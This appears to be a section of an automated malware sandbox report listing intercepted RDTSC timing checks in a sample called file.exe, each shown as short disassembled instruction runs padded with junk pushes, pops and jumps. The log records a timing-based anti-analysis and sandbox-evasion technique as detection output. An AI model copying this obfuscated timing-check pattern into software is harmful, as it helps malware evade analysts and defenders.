              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424D83 second address: 424D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E6851342Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 425339 second address: 42533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42533D second address: 425341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B3C8 second address: 42B3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F20h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B3DC second address: 42B3E6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E68513426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B3E6 second address: 42B411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F5E68E41F1Dh 0x00000015 jmp 00007F5E68E41F1Dh 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42AB17 second address: 42AB1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42AB1C second address: 42AB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F5E68E41F1Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42ACA6 second address: 42ACB3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B0D7 second address: 42B0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f je 00007F5E68E41F16h 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B0ED second address: 42B108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5E68513426h 0x0000000a jmp 00007F5E68513431h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B108 second address: 42B111 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42F157 second address: 42F15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42F15B second address: 42F168 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E68E41F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42F168 second address: 42F16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42EB9E second address: 42EBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42EBA2 second address: 42EBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F5E68513432h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42EBC6 second address: 42EBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E68E41F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42EBD0 second address: 42EBEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5E68513432h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42ED56 second address: 42ED5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434DDA second address: 434DE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5E6851342Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434DE8 second address: 434E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F5E68E41F20h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E02 second address: 434E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353A0 second address: 4353AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5E68E41F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353AA second address: 4353B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353B5 second address: 4353D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnc 00007F5E68E41F1Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jno 00007F5E68E41F16h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353D8 second address: 4353E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F5E68513432h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353E5 second address: 4353EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353EB second address: 4353EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4353EF second address: 435409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5E68E41F24h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435409 second address: 43540D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43956A second address: 439573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43985E second address: 43987A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5E68513435h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43987A second address: 4398A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F1Bh 0x00000009 popad 0x0000000a jmp 00007F5E68E41F1Dh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 jns 00007F5E68E41F16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43FEFB second address: 43FF43 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5E68513430h 0x0000000f popad 0x00000010 push esi 0x00000011 push ecx 0x00000012 jmp 00007F5E68513432h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E68513434h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E9BB second address: 43E9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jbe 00007F5E68E41F16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E9CA second address: 43E9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F5E6851342Fh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E9E0 second address: 43E9EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5E68E41F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43EC6A second address: 43EC70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43EDA0 second address: 43EDA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43F014 second address: 43F023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 ja 00007F5E68513426h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43F023 second address: 43F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F23h 0x00000009 popad 0x0000000a push esi 0x0000000b ja 00007F5E68E41F16h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E10B6 second address: 3E10BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1155 second address: 3E115A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43F2D5 second address: 43F2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43F2DA second address: 43F2EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 jl 00007F5E68E41F18h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43F2EF second address: 43F2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 445B6E second address: 445BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5E68E41F1Bh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 jnc 00007F5E68E41F27h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446456 second address: 44645A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44645A second address: 44645E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446CF8 second address: 446D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68513434h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446D12 second address: 446D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F5E68E41F1Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446FD0 second address: 446FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446FD6 second address: 446FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D181 second address: 44D189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D2EF second address: 44D302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D77E second address: 44D7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E6851342Fh 0x00000008 jmp 00007F5E68513435h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B988 second address: 45B98C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B98C second address: 45B998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5E68513426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B998 second address: 45B9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5E68E41F16h 0x0000000a jp 00007F5E68E41F16h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B9A8 second address: 45B9AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B9AC second address: 45B9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B9B7 second address: 45B9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39492A second address: 39492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459FD6 second address: 459FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B10B second address: 45B145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F26h 0x00000009 popad 0x0000000a jmp 00007F5E68E41F29h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B145 second address: 45B14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B14A second address: 45B14F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 462125 second address: 46213F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F5E68513426h 0x0000000c popad 0x0000000d jmp 00007F5E6851342Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46213F second address: 462162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5E68E41F16h 0x00000009 jmp 00007F5E68E41F28h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622C9 second address: 4622CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622CD second address: 4622D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622D1 second address: 4622D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622D7 second address: 4622E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622E2 second address: 4622E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622E9 second address: 462313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5E68E41F22h 0x0000000e popad 0x0000000f jl 00007F5E68E41F22h 0x00000015 ja 00007F5E68E41F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705BE second address: 4705E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F5E68513438h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705E3 second address: 4705ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705ED second address: 47060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F5E68513426h 0x0000000d jmp 00007F5E68513434h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47449F second address: 4744A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4744A3 second address: 4744AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4744AE second address: 4744CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F5E68E41F1Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4744CA second address: 4744DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F5E6851342Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4744DA second address: 4744F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5E68E41F25h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47910B second address: 479111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479111 second address: 479128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F5E68E41F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F5E68E41F16h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479128 second address: 47912C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481B94 second address: 481BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481BA1 second address: 481BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481BA5 second address: 481BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F27h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5E68E41F1Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481A07 second address: 481A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E31 second address: 487E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E3D second address: 487E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E68513435h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E5B second address: 487E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F25h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E7D second address: 487E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E81 second address: 487E8B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E68E41F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487FD3 second address: 487FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48816F second address: 488175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4883F0 second address: 488408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E6851342Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007F5E68513426h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488583 second address: 488587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
